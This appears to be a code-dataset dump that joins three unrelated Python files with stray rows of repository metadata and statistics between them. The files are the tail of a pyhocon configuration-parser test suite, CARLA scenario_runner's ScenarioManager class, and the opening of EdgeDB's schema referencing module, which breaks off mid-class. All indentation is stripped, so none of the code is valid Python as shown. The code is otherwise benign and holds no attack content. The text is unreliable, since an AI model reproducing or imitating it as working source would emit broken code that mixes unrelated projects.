def test_self_merge_ref_substitutions_object2(self):
config1 = ConfigFactory.parse_string(
"""
x : { v1: 1 }
b1 : {v2: 2 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b2 : ${x} {v2: 3}
b += [${b2}]
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
b = merged.get("b")
assert len(b) == 2
assert b[0] == {'v2': 2}
assert b[1] == {'v1': 1, 'v2': 3}
def test_self_merge_ref_substitutions_object3(self):
config1 = ConfigFactory.parse_string(
"""
b1 : { v1: 1 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b1 : { v1: 2, v2: 3 }
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("b1") == {"v1": 2, "v2": 3}
b = merged.get("b")
assert len(b) == 1
assert b[0] == {"v1": 2, "v2": 3}
def test_fallback_self_ref_substitutions_merge(self):
config1 = ConfigFactory.parse_string(
"""
dict = { x: 1 }
"""
)
config2 = ConfigFactory.parse_string(
"""
dict = ${dict} { y: 2 }
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("dict") == {'x': 1, 'y': 2}
def test_fallback_self_ref_substitutions_concat_string(self):
config1 = ConfigFactory.parse_string(
"""
string = abc
"""
)
config2 = ConfigFactory.parse_string(
"""
string = ${string}def
""",
resolve=False
)
result = config2.with_fallback(config1)
assert result.get("string") == 'abcdef'
# test no mutation on config1
assert result is not config1
# test no mutation on config2
assert "abc" not in str(config2)
def test_fallback_non_root(self):
root = ConfigFactory.parse_string(
"""
a = 1
mid.b = 1
"""
)
config = root.get_config("mid").with_fallback(root)
assert config['a'] == 1 and config['b'] == 1
def test_object_field_substitution(self):
config = ConfigFactory.parse_string(
"""
A = ${Test}
Test {
field1 = 1
field2 = ${Test.field1}"2"
field3 = ${Test.field2}"3"
}
"""
)
assert config.get_string("A.field1") == "1"
assert config.get_string("A.field2") == "12"
assert config.get_string("A.field3") == "123"
assert config.get_string("Test.field1") == "1"
assert config.get_string("Test.field2") == "12"
assert config.get_string("Test.field3") == "123"
def test_one_line_quote_escape(self):
config = ConfigFactory.parse_string(
"""
test_no_quotes: abc\\n\\n
test_quotes: "abc\\n\\n"
"""
)
assert config == {
'test_no_quotes': 'abc\n\n',
'test_quotes': 'abc\n\n'
}
def test_multi_line_escape(self):
config = ConfigFactory.parse_string(
"""
with-escaped-backslash: \"\"\"
\\\\
\"\"\"
with-newline-escape-sequence: \"\"\"
\\n
\"\"\"
with-escaped-newline-escape-sequence: \"\"\"
\\\\n
\"\"\"
"""
)
assert config['with-escaped-backslash'] == '\n\\\\\n'
assert config['with-newline-escape-sequence'] == '\n\\n\n'
assert config['with-escaped-newline-escape-sequence'] == '\n\\\\n\n'
def test_multiline_with_backslash(self):
config = ConfigFactory.parse_string(
"""
test = line1 \
line2
test2 = test
""")
assert config == {
'test': 'line1 line2',
'test2': 'test'
}
def test_from_dict_with_dict(self):
d = {
'banana': 3,
'apple': 4,
'pear': 1,
'orange': 2,
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_ordered_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['orange'] = 2
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_nested_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['tree'] = {
'a': 'abc\ntest\n',
'b': [1, 2, 3]
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_object_concat(self):
config = ConfigFactory.parse_string(
"""o1 = {
foo : {
a : 1
b : 2
}
}
o2 = {
foo : {
b : 3
c : 4
}
}
o3 = ${o1} ${o2}
"""
)
assert config.get_int('o1.foo.b') == 2
assert config.get_int('o2.foo.b') == 3
assert config.get_int('o3.foo.b') == 3
assert config.get_int('o1.foo.c', default=42) == 42
assert config.get_int('o3.foo.a') == 1
assert config.get_int('o3.foo.c') == 4
def test_issue_75(self):
config = ConfigFactory.parse_string(
"""base : {
bar: ["a"]
}
sub : ${base} {
baz: ${base.bar} ["b"]
}
sub2: ${sub}
"""
)
assert config.get_list('base.bar') == ["a"]
assert config.get_list('sub.baz') == ["a", "b"]
assert config.get_list('sub2.baz') == ["a", "b"]
def test_plain_ordered_dict(self):
config = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
with pytest.raises(ConfigException):
config.as_plain_ordered_dict()
def test_quoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
no_trailing_ws = "foo" "bar "
trailing_ws = "foo" "bar "{ws}
trailing_ws_with_comment = "foo" "bar "{ws}// comment
""".format(ws=' '))
assert config == {
'no_trailing_ws': "foo bar ",
'trailing_ws': "foo bar ",
'trailing_ws_with_comment': "foo bar "
}
def test_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo bar
""")
assert config == {
'a': 'foo bar'
}
def test_quoted_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo "bar" dummy
""")
assert config == {
'a': 'foo bar dummy'
}
def test_quoted_unquoted_strings_with_ws_substitutions(self):
config = ConfigFactory.parse_string(
"""
x = 5
b = test
a = foo "bar" ${b} dummy
c = foo ${x} bv
d = foo ${x} 43
""")
assert config == {
'x': 5,
'b': 'test',
'a': 'foo bar test dummy',
'c': 'foo 5 bv',
'd': 'foo 5 43'
}
def test_complex_substitutions(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: ${c} {
pa: [${a}]
pb: ${b.pa}
}
c: { }
d: { pc: ${b.pa} }
e: ${b}
""", resolve=True)
assert config == {
'a': 1,
'b': {'pa': [1], 'pb': [1]},
'c': {},
'd': {'pc': [1]},
'e': {'pa': [1], 'pb': [1]}
}
def test_assign_next_line(self):
config = ConfigFactory.parse_string(
"""
a = // abc
abc
c =
5
""")
assert config == {
'a': 'abc',
'c': 5
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment(self):
config = ConfigFactory.parse_string(
"""
string_from_env = ${STRING_VAR}
""")
assert config == {
'string_from_env': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref_optional(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${?STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, TRUE_OR_FALSE='false')
def test_bool_from_environment(self):
config = ConfigFactory.parse_string(
"""
bool_from_env = ${TRUE_OR_FALSE}
""")
assert config == {
'bool_from_env': 'false'
}
assert config.get_bool('bool_from_env') is False
@mock.patch.dict(os.environ, INT_VAR='5')
def test_int_from_environment(self):
config = ConfigFactory.parse_string(
"""
int_from_env = ${INT_VAR}
""")
assert config == {
'int_from_env': '5'
}
assert config.get_int('int_from_env') == 5
def test_unicode_dict_key(self):
input_string = u"""
www.sample.com {
us {
name = "first domain"
}
}
www.example-ö.com {
us {
name = "second domain"
}
}
"""
config = ConfigFactory.parse_string(input_string)
assert config.get_string(u'www.sample.com.us.name') == 'first domain'
assert config.get_string(u'www.example-ö.com.us.name') == 'second domain'
with pytest.raises(ConfigWrongTypeException):
config.put(u'www.example-ö', 'append_failure', append=True)
with pytest.raises(ConfigMissingException):
config.get_string(u'missing_unicode_key_ö')
with pytest.raises(ConfigException):
config.get_bool(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_list(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_config(u'www.example-ö.com.us.name')
with pytest.raises(ConfigWrongTypeException):
config.get_string(u'www.example-ö.com.us.name.missing')
def test_with_comment_on_last_line(self):
# Adress issue #102
config_tree = ConfigFactory.parse_string("""
foo: "1"
bar: "2"
# DO NOT CHANGE ANY OF THE ABOVE SETTINGS!""")
assert config_tree == {
'foo': '1',
'bar': '2'
}
def test_triple_quotes_same_line(self):
config_tree = ConfigFactory.parse_string('a:["""foo"""", "bar"]')
assert config_tree == {
'a': ['foo"', "bar"]
}
def test_pop(self):
config_tree = ConfigFactory.parse_string('a:{b: 3, d: 6}')
assert 3 == config_tree.pop('a.b', 5)
assert 5 == config_tree.pop('a.c', 5)
expected = {
'a': {'d': 6}
}
assert expected == config_tree
def test_merge_overriden(self):
# Adress issue #110
# ConfigValues must merge with its .overriden_value
# if both are ConfigTree
config_tree = ConfigFactory.parse_string("""
foo: ${bar}
foo: ${baz}
bar: {r: 1, s: 2}
baz: {s: 3, t: 4}
""")
assert 'r' in config_tree['foo'] and 't' in config_tree['foo'] and config_tree['foo']['s'] == 3
def test_attr_syntax(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: {
pb: 5
}
""")
assert 5 == config.b.pb
def test_escape_quote(self):
config = ConfigFactory.parse_string(
"""
quoted: "abc\\"test"
unquoted: abc\\"test
""")
assert 'abc"test' == config['quoted']
assert 'abc"test' == config['unquoted']
def test_escape_quote_complex(self):
config = ConfigFactory.parse_string(
"""
value: "{\\"critical\\":\\"0.00\\",\\"warning\\":\\"99.99\\"}"
"""
)
assert '{"critical":"0.00","warning":"99.99"}' == config['value']
def test_keys_with_slash(self):
config = ConfigFactory.parse_string(
"""
/abc/cde1: abc
"/abc/cde2": "cde"
/abc/cde3: "fgh"
""")
assert 'abc' == config['/abc/cde1']
assert 'cde' == config['/abc/cde2']
assert 'fgh' == config['/abc/cde3']
def test_mutation_values(self):
config = ConfigFactory.parse_string(
"""
common : {
}
b1 = []
var = "wrong"
compilerCommon : ${common} {
VAR : ${var}
}
substrate-suite: {
VAR : "right"
}
b1 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
b2 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
""")
assert config.get("b1")[1]['VAR'] == 'right'
assert config.get("b2")[1]['VAR'] == 'right'
def test_escape_sequences_json_equivalence(self):
"""
Quoted strings are in the same format as JSON strings,
See: https://github.com/lightbend/config/blob/master/HOCON.md#unchanged-from-json
"""
source = r"""
{
"plain-backslash": "\\",
"tab": "\t",
"no-tab": "\\t",
"newline": "\n",
"no-newline": "\\n",
"cr": "\r",
"no-cr": "\\r",
"windows": "c:\\temp"
}
"""
expected = {
'plain-backslash': '\\',
'tab': '\t',
'no-tab': '\\t',
'newline': '\n',
'no-newline': '\\n',
'cr': '\r',
'no-cr': '\\r',
'windows': 'c:\\temp',
}
config = ConfigFactory.parse_string(source)
assert config == expected
assert config == json.loads(source)
try:
from dateutil.relativedelta import relativedelta
@pytest.mark.parametrize('data_set', [
('a: 1 months', relativedelta(months=1)),
('a: 1months', relativedelta(months=1)),
('a: 2 month', relativedelta(months=2)),
('a: 3 mo', relativedelta(months=3)),
('a: 3mo', relativedelta(months=3)),
('a: 3 mon', '3 mon'),
('a: 1 years', relativedelta(years=1)),
('a: 1years', relativedelta(years=1)),
('a: 2 year', relativedelta(years=2)),
('a: 3 y', relativedelta(years=3)),
('a: 3y', relativedelta(years=3)),
])
def test_parse_string_with_duration_optional_units(data_set):
config = ConfigFactory.parse_string(data_set[0])
assert config['a'] == data_set[1]
except Exception:
pass
| 28.381397
| 120
| 0.44385
| 6,804
| 69,875
| 4.403733
| 0.084656
| 0.079698
| 0.144979
| 0.102126
| 0.655241
| 0.553316
| 0.440243
| 0.369389
| 0.294363
| 0.240263
| 0
| 0.032573
| 0.419606
| 69,875
| 2,461
| 121
| 28.39293
| 0.706251
| 0.016601
| 0
| 0.284763
| 0
| 0
| 0.115627
| 0.022591
| 0
| 0
| 0
| 0
| 0.245629
| 1
| 0.122398
| false
| 0.003331
| 0.01249
| 0
| 0.13572
| 0.000833
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a1474b58c5efbf18c61bee86e2d5e292bdda41
| 7,416
|
py
|
Python
|
scenario_runner/srunner/scenariomanager/scenario_manager.py
|
cgeller/WorldOnRails
|
d8aa9f7ae67a6b7b71a2fc5ba86bb2a44f221bef
|
[
"MIT"
] | 447
|
2021-03-26T09:29:17.000Z
|
2022-03-30T03:03:35.000Z
|
scenario_runner/srunner/scenariomanager/scenario_manager.py
|
cgeller/WorldOnRails
|
d8aa9f7ae67a6b7b71a2fc5ba86bb2a44f221bef
|
[
"MIT"
] | 56
|
2021-04-21T03:12:50.000Z
|
2022-03-30T13:34:16.000Z
|
scenario_runner/srunner/scenariomanager/scenario_manager.py
|
cgeller/WorldOnRails
|
d8aa9f7ae67a6b7b71a2fc5ba86bb2a44f221bef
|
[
"MIT"
] | 82
|
2021-04-14T04:34:04.000Z
|
2022-03-29T07:35:15.000Z
|
#!/usr/bin/env python
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides the ScenarioManager implementation.
It must not be modified and is for reference only!
"""
from __future__ import print_function
import sys
import time
import py_trees
from srunner.autoagents.agent_wrapper import AgentWrapper
from srunner.scenariomanager.carla_data_provider import CarlaDataProvider
from srunner.scenariomanager.result_writer import ResultOutputProvider
from srunner.scenariomanager.timer import GameTime
from srunner.scenariomanager.watchdog import Watchdog
class ScenarioManager(object):
"""
Basic scenario manager class. This class holds all functionality
required to start, and analyze a scenario.
The user must not modify this class.
To use the ScenarioManager:
1. Create an object via manager = ScenarioManager()
2. Load a scenario via manager.load_scenario()
3. Trigger the execution of the scenario manager.run_scenario()
This function is designed to explicitly control start and end of
the scenario execution
4. Trigger a result evaluation with manager.analyze_scenario()
5. If needed, cleanup with manager.stop_scenario()
"""
def __init__(self, debug_mode=False, sync_mode=False, timeout=2.0):
"""
Setups up the parameters, which will be filled at load_scenario()
"""
self.scenario = None
self.scenario_tree = None
self.scenario_class = None
self.ego_vehicles = None
self.other_actors = None
self._debug_mode = debug_mode
self._agent = None
self._sync_mode = sync_mode
self._running = False
self._timestamp_last_run = 0.0
self._timeout = timeout
self._watchdog = Watchdog(float(self._timeout))
self.scenario_duration_system = 0.0
self.scenario_duration_game = 0.0
self.start_system_time = None
self.end_system_time = None
def _reset(self):
"""
Reset all parameters
"""
self._running = False
self._timestamp_last_run = 0.0
self.scenario_duration_system = 0.0
self.scenario_duration_game = 0.0
self.start_system_time = None
self.end_system_time = None
GameTime.restart()
def cleanup(self):
"""
This function triggers a proper termination of a scenario
"""
if self.scenario is not None:
self.scenario.terminate()
if self._agent is not None:
self._agent.cleanup()
self._agent = None
CarlaDataProvider.cleanup()
def load_scenario(self, scenario, agent=None):
"""
Load a new scenario
"""
self._reset()
self._agent = AgentWrapper(agent) if agent else None
if self._agent is not None:
self._sync_mode = True
self.scenario_class = scenario
self.scenario = scenario.scenario
self.scenario_tree = self.scenario.scenario_tree
self.ego_vehicles = scenario.ego_vehicles
self.other_actors = scenario.other_actors
# To print the scenario tree uncomment the next line
# py_trees.display.render_dot_tree(self.scenario_tree)
if self._agent is not None:
self._agent.setup_sensors(self.ego_vehicles[0], self._debug_mode)
def run_scenario(self):
"""
Trigger the start of the scenario and wait for it to finish/fail
"""
print("ScenarioManager: Running scenario {}".format(self.scenario_tree.name))
self.start_system_time = time.time()
start_game_time = GameTime.get_time()
self._watchdog.start()
self._running = True
while self._running:
timestamp = None
world = CarlaDataProvider.get_world()
if world:
snapshot = world.get_snapshot()
if snapshot:
timestamp = snapshot.timestamp
if timestamp:
self._tick_scenario(timestamp)
self._watchdog.stop()
self.cleanup()
self.end_system_time = time.time()
end_game_time = GameTime.get_time()
self.scenario_duration_system = self.end_system_time - \
self.start_system_time
self.scenario_duration_game = end_game_time - start_game_time
if self.scenario_tree.status == py_trees.common.Status.FAILURE:
print("ScenarioManager: Terminated due to failure")
def _tick_scenario(self, timestamp):
"""
Run next tick of scenario and the agent.
If running synchornously, it also handles the ticking of the world.
"""
if self._timestamp_last_run < timestamp.elapsed_seconds and self._running:
self._timestamp_last_run = timestamp.elapsed_seconds
self._watchdog.update()
if self._debug_mode:
print("\n--------- Tick ---------\n")
# Update game time and actor information
GameTime.on_carla_tick(timestamp)
CarlaDataProvider.on_carla_tick()
if self._agent is not None:
ego_action = self._agent()
# Tick scenario
self.scenario_tree.tick_once()
if self._debug_mode:
print("\n")
py_trees.display.print_ascii_tree(self.scenario_tree, show_status=True)
sys.stdout.flush()
if self.scenario_tree.status != py_trees.common.Status.RUNNING:
self._running = False
if self._agent is not None:
self.ego_vehicles[0].apply_control(ego_action)
if self._sync_mode and self._running and self._watchdog.get_status():
CarlaDataProvider.get_world().tick()
def get_running_status(self):
"""
returns:
bool: False if watchdog exception occured, True otherwise
"""
return self._watchdog.get_status()
def stop_scenario(self):
"""
This function is used by the overall signal handler to terminate the scenario execution
"""
self._running = False
def analyze_scenario(self, stdout, filename, junit):
"""
This function is intended to be called from outside and provide
the final statistics about the scenario (human-readable, in form of a junit
report, etc.)
"""
failure = False
timeout = False
result = "SUCCESS"
if self.scenario.test_criteria is None:
print("Nothing to analyze, this scenario has no criteria")
return True
for criterion in self.scenario.get_criteria():
if (not criterion.optional and
criterion.test_status != "SUCCESS" and
criterion.test_status != "ACCEPTABLE"):
failure = True
result = "FAILURE"
elif criterion.test_status == "ACCEPTABLE":
result = "ACCEPTABLE"
if self.scenario.timeout_node.timeout and not failure:
timeout = True
result = "TIMEOUT"
output = ResultOutputProvider(self, result, stdout, filename, junit)
output.write()
return failure or timeout
| 31.965517
| 95
| 0.631338
| 869
| 7,416
| 5.18527
| 0.253165
| 0.066578
| 0.028407
| 0.014425
| 0.148691
| 0.148691
| 0.122947
| 0.093209
| 0.080337
| 0.061252
| 0
| 0.005528
| 0.292611
| 7,416
| 231
| 96
| 32.103896
| 0.853412
| 0.220874
| 0
| 0.185484
| 0
| 0
| 0.039327
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072581
| false
| 0
| 0.072581
| 0
| 0.177419
| 0.056452
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a20e94df54130a998b207ca8a8c8a5a8437f0f
| 43,104
|
py
|
Python
|
edb/schema/referencing.py
|
disfated/edgedb
|
8d78f4a2a578f80780be160ba5f107f5bdc79063
|
[
"Apache-2.0"
] | null | null | null |
edb/schema/referencing.py
|
disfated/edgedb
|
8d78f4a2a578f80780be160ba5f107f5bdc79063
|
[
"Apache-2.0"
] | null | null | null |
edb/schema/referencing.py
|
disfated/edgedb
|
8d78f4a2a578f80780be160ba5f107f5bdc79063
|
[
"Apache-2.0"
] | null | null | null |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2008-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import hashlib
from edb import errors
from edb.common import struct
from edb.edgeql import ast as qlast
from . import delta as sd
from . import inheriting
from . import objects as so
from . import schema as s_schema
from . import name as sn
from . import utils
ReferencedT = TypeVar('ReferencedT', bound='ReferencedObject')
ReferencedInheritingObjectT = TypeVar('ReferencedInheritingObjectT',
bound='ReferencedInheritingObject')
class ReferencedObject(so.DerivableObject):
#: True if the object has an explicit definition and is not
#: purely inherited.
is_local = so.SchemaField(
bool,
default=False,
inheritable=False,
compcoef=0.909,
reflection_method=so.ReflectionMethod.AS_LINK,
)
def get_subject(self, schema: s_schema.Schema) -> Optional[so.Object]:
# NB: classes that inherit ReferencedObject define a `get_subject`
# method dynamically, with `subject = SchemaField`
raise NotImplementedError
def get_referrer(self, schema: s_schema.Schema) -> Optional[so.Object]:
return self.get_subject(schema)
def delete(self, schema: s_schema.Schema) -> s_schema.Schema:
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.DeleteObject, type(self))
cmd = cmdcls(classname=self.get_name(schema))
context = sd.CommandContext(
modaliases={},
schema=schema,
disable_dep_verification=True,
)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self)
parent_cmd.add(cmd)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
schema = delta.apply(schema, context)
return schema
def derive_ref(
self: ReferencedT,
schema: s_schema.Schema,
referrer: so.QualifiedObject,
*qualifiers: str,
mark_derived: bool = False,
attrs: Optional[Dict[str, Any]] = None,
dctx: Optional[sd.CommandContext] = None,
derived_name_base: Optional[str] = None,
inheritance_merge: bool = True,
preserve_path_id: Optional[bool] = None,
refdict_whitelist: Optional[AbstractSet[str]] = None,
transient: bool = False,
name: Optional[str] = None,
**kwargs: Any,
) -> Tuple[s_schema.Schema, ReferencedT]:
if name is None:
derived_name: str = self.get_derived_name(
schema, referrer, *qualifiers,
mark_derived=mark_derived,
derived_name_base=derived_name_base)
else:
derived_name = name
if self.get_name(schema) == derived_name:
raise errors.SchemaError(
f'cannot derive {self!r}({derived_name}) from itself')
derived_attrs: Dict[str, object] = {}
if attrs is not None:
derived_attrs.update(attrs)
derived_attrs['name'] = derived_name
derived_attrs['bases'] = so.ObjectList.create(
schema, [self])
mcls = type(self)
referrer_class = type(referrer)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for_name(schema, derived_name)
refcoll = referrer.get_field_value(schema, refdict.attr)
existing = refcoll.get(schema, refname, default=None)
if existing is not None:
cmdcls: Type[sd.Command] = \
sd.ObjectCommandMeta.get_command_class_or_die(sd.AlterObject,
type(self))
else:
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.CreateObject, type(self))
cmd = cmdcls(classname=derived_name)
for k, v in derived_attrs.items():
cmd.set_attribute_value(k, v)
if existing is not None:
new_bases = derived_attrs['bases']
old_bases = existing.get_bases(schema)
if new_bases != old_bases:
assert isinstance(new_bases, so.ObjectList)
removed_bases, added_bases = inheriting.delta_bases(
[b.get_name(schema) for b in old_bases.objects(schema)],
[b.get_name(schema) for b in new_bases.objects(schema)],
)
rebase_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
inheriting.RebaseInheritingObject, type(self))
rebase_cmd = rebase_cmdcls(
classname=derived_name,
added_bases=added_bases,
removed_bases=removed_bases,
)
cmd.add(rebase_cmd)
context = sd.CommandContext(
modaliases={},
schema=schema,
)
assert isinstance(cmd, sd.ObjectCommand)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self, referrer=referrer)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
if not inheritance_merge:
context.current().inheritance_merge = False
if refdict_whitelist is not None:
context.current().inheritance_refdicts = refdict_whitelist
if mark_derived:
context.current().mark_derived = True
if transient:
context.current().transient_derivation = True
if preserve_path_id:
context.current().preserve_path_id = True
parent_cmd.add(cmd)
schema = delta.apply(schema, context)
derived: ReferencedT = schema.get(derived_name)
return schema, derived
def get_verbosename(
self,
schema: s_schema.Schema,
*,
with_parent: bool = False,
) -> str:
vn = super().get_verbosename(schema)
if with_parent:
subject = self.get_subject(schema)
if subject is not None:
pn = subject.get_verbosename(schema, with_parent=True)
return f'{vn} of {pn}'
return vn
class ReferencedInheritingObject(
so.DerivableInheritingObject,
ReferencedObject,
):
# Indicates that the object has been declared as
# explicitly inherited.
declared_overloaded = so.SchemaField(
bool,
default=False,
compcoef=None,
introspectable=False,
inheritable=False,
ephemeral=True,
)
def get_implicit_bases(
self: ReferencedInheritingObjectT,
schema: s_schema.Schema,
) -> List[ReferencedInheritingObjectT]:
return [
b for b in self.get_bases(schema).objects(schema)
if not b.generic(schema)
]
class ReferencedObjectCommandMeta(sd.ObjectCommandMeta):
_transparent_adapter_subclass: ClassVar[bool] = True
_referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None
def __new__(mcls,
name: str,
bases: Tuple[type, ...],
clsdct: Dict[str, Any],
*,
referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None,
**kwargs: Any
) -> ReferencedObjectCommandMeta:
cls = super().__new__(mcls, name, bases, clsdct, **kwargs)
assert isinstance(cls, ReferencedObjectCommandMeta)
if referrer_context_class is not None:
cls._referrer_context_class = referrer_context_class
return cls
class ReferencedObjectCommandBase(
sd.QualifiedObjectCommand[ReferencedT],
metaclass=ReferencedObjectCommandMeta,
):
@classmethod
def get_referrer_context_class(
cls,
) -> Type[sd.ObjectCommandContext[so.Object]]:
if cls._referrer_context_class is None:
raise TypeError(
f'referrer_context_class is not defined for {cls}')
return cls._referrer_context_class
@classmethod
def get_referrer_context(
cls,
context: sd.CommandContext,
) -> Optional[sd.ObjectCommandContext[so.Object]]:
"""Get the context of the command for the referring object, if any.
E.g. for a `create/alter/etc concrete link` command this would
be the context of the `create/alter/etc type` command.
"""
ctxcls = cls.get_referrer_context_class()
ctx = context.get(ctxcls) # type: ignore
return cast(Optional[sd.ObjectCommandContext[so.Object]], ctx)
@classmethod
def get_referrer_context_or_die(
cls,
context: sd.CommandContext,
) -> sd.ObjectCommandContext[so.Object]:
ctx = cls.get_referrer_context(context)
if ctx is None:
raise RuntimeError(f'no referrer context for {cls}')
return ctx
class StronglyReferencedObjectCommand(
ReferencedObjectCommandBase[ReferencedT]
):
pass
class ReferencedObjectCommand(ReferencedObjectCommandBase[ReferencedT]):
@classmethod
def _classname_from_ast(cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
context: sd.CommandContext
) -> sn.Name:
name = super()._classname_from_ast(schema, astnode, context)
parent_ctx = cls.get_referrer_context(context)
if parent_ctx is not None:
assert isinstance(parent_ctx.op, sd.QualifiedObjectCommand)
referrer_name = parent_ctx.op.classname
base_name: str
try:
base_ref = utils.ast_to_object(
astnode.name,
modaliases=context.modaliases,
schema=schema,
)
except errors.InvalidReferenceError:
base_name = sn.Name(name)
else:
base_name = base_ref.get_name(schema)
quals = cls._classname_quals_from_ast(
schema, astnode, base_name, referrer_name, context)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
name = sn.Name(name=pnn, module=referrer_name.module)
assert isinstance(name, sn.Name)
return name
@classmethod
def _classname_from_name(
cls,
name: sn.SchemaName,
referrer_name: sn.SchemaName,
) -> sn.Name:
base_name = sn.shortname_from_fullname(name)
quals = cls._classname_quals_from_name(name)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
return sn.Name(name=pnn, module=referrer_name.module)
@classmethod
def _classname_quals_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
base_name: str,
referrer_name: str,
context: sd.CommandContext,
) -> Tuple[str, ...]:
return ()
@classmethod
def _classname_quals_from_name(
cls,
name: sn.SchemaName,
) -> Tuple[str, ...]:
return ()
@classmethod
def _name_qual_from_exprs(cls,
schema: s_schema.Schema,
exprs: Iterable[str]) -> str:
m = hashlib.sha1()
for expr in exprs:
m.update(expr.encode())
return m.hexdigest()
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
subject_ctx = self.get_referrer_context(context)
ref_astnode: Type[qlast.DDLOperation] = getattr(self,
'referenced_astnode',
None)
if subject_ctx is not None and ref_astnode is not None:
return ref_astnode
else:
if isinstance(self.astnode, (list, tuple)):
return self.astnode[1]
else:
return self.astnode
def _build_alter_cmd_stack(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: so.Object,
*,
referrer: Optional[so.Object] = None
) -> Tuple[sd.DeltaRoot, sd.Command]:
delta = sd.DeltaRoot()
if referrer is None:
assert isinstance(scls, ReferencedObject)
referrer = scls.get_referrer(schema)
obj = referrer
object_stack = []
if type(self) != type(referrer):
object_stack.append(referrer)
while obj is not None:
if isinstance(obj, ReferencedObject):
obj = obj.get_referrer(schema)
object_stack.append(obj)
else:
obj = None
cmd: sd.Command = delta
for obj in reversed(object_stack):
assert obj is not None
alter_cmd_cls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, type(obj))
alter_cmd = alter_cmd_cls(classname=obj.get_name(schema))
cmd.add(alter_cmd)
cmd = alter_cmd
return delta, cmd
class CreateReferencedObject(
ReferencedObjectCommand[ReferencedT],
sd.CreateObject[ReferencedT],
):
referenced_astnode: ClassVar[Type[qlast.ObjectDDL]]
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
if isinstance(astnode, cls.referenced_astnode):
objcls = cls.get_schema_metaclass()
referrer_ctx = cls.get_referrer_context_or_die(context)
referrer_class = referrer_ctx.op.get_schema_metaclass()
referrer_name = referrer_ctx.op.classname
refdict = referrer_class.get_refdict_for_class(objcls)
cmd.set_attribute_value(
refdict.backref_attr,
so.ObjectShell(
name=referrer_name,
schemaclass=referrer_class,
),
)
cmd.set_attribute_value('is_local', True)
